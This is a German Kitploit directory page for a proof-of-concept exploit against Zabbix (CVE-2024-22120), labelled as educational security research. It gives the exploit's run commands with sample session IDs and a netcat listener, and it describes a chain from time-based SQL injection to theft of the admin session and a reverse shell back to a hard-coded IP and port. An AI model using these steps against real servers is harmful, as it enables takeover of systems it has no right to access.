Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/darkbytehunter/cve-2024-22120-rce-with-gopher
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubdarkbytehunter/cve-2024-22120-rce-with-gopher

CVE-2024-22120-RCE-with-gopher

Proof-of-concept-Exploit für CVE-2024-22120, der zeitbasierte SQL-Injection und Gopher-basierte SSRF ausnutzt, um Remote-Code-Ausführung auf verwundbaren Zabbix-Servern zu erreichen – für Bildungszwecke in der Sicherheitsforschung.

Repository anzeigen
12vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Verwendung

root@kitploit:~
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>

Beispiel-Szenario

Sie haben einen Zabbix-Server identifiziert, der auf der IP 192.168.1.100 läuft, und Sie haben Zugriff auf einen Benutzer mit niedrigen Rechten mit den folgenden Details:

  • Sitzungs-ID (sid): d82bf6715e1d3c1f25
  • Host-ID (hostid): 10107
  • PHP-Sitzungs-ID (phpsessid): a4g7f48d9j3r7h8s9g

Sie möchten die RCE-Schwachstelle mit diesem Skript ausnutzen.

Ausführen des Skripts

root@kitploit:~
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3

Erklärung der Parameter:

  • --ip 192.168.1.100: Die IP-Adresse des Zabbix-Servers.
  • --sid d82bf6715e1d3c1f25: Die Sitzungs-ID eines Benutzers mit niedrigen Rechten.
  • --hostid 10107: Die ID eines Hosts, auf den der Benutzer mit niedrigen Rechten zugreifen kann.
  • --phpsessid a4g7f48d9j3r7h8s9g: Die PHP-Sitzungs-ID, die zur Authentifizierung von Anfragen verwendet wird.
  • --false_time 1: Zeit in Sekunden, die bei einer falschen Vermutung während der SQL-Injektion gewartet wird (Standard ist 1 Sekunde).
  • --true_time 3: Zeit in Sekunden, die bei einer richtigen Vermutung während der SQL-Injektion gewartet wird (Standard ist 3 Sekunden).

Was als Nächstes passiert:

  1. Das Skript beginnt damit, zu versuchen, die Admin-Sitzungs-ID mithilfe einer zeitbasierten SQL-Injektion zu extrahieren.
  2. Sobald die Admin-Sitzungs-ID erhalten wurde, erstellt das Skript ein Reverse-Shell-Skript auf dem Zabbix-Server.
  3. Schließlich führt das Skript die Reverse-Shell aus, die sich mit Ihrer Maschine über die angegebene IP und den angegebenen Port verbindet (10.0.46.27:5555 im Skript).

Hinweise:

  • Stellen Sie sicher, dass Ihre Maschine auf dem angegebenen Port lauscht (5555 im Skript), um die Reverse-Shell zu empfangen. Sie können dafür netcat verwenden:

    root@kitploit:~
    nc -lvnp 5555
    
  • Ersetzen Sie die IP 10.0.46.27 und den Port 5555 in der Funktion CreateScript durch Ihre eigene IP und den gewünschten Port, um die Reverse-Shell zu empfangen.

Tool herunterladen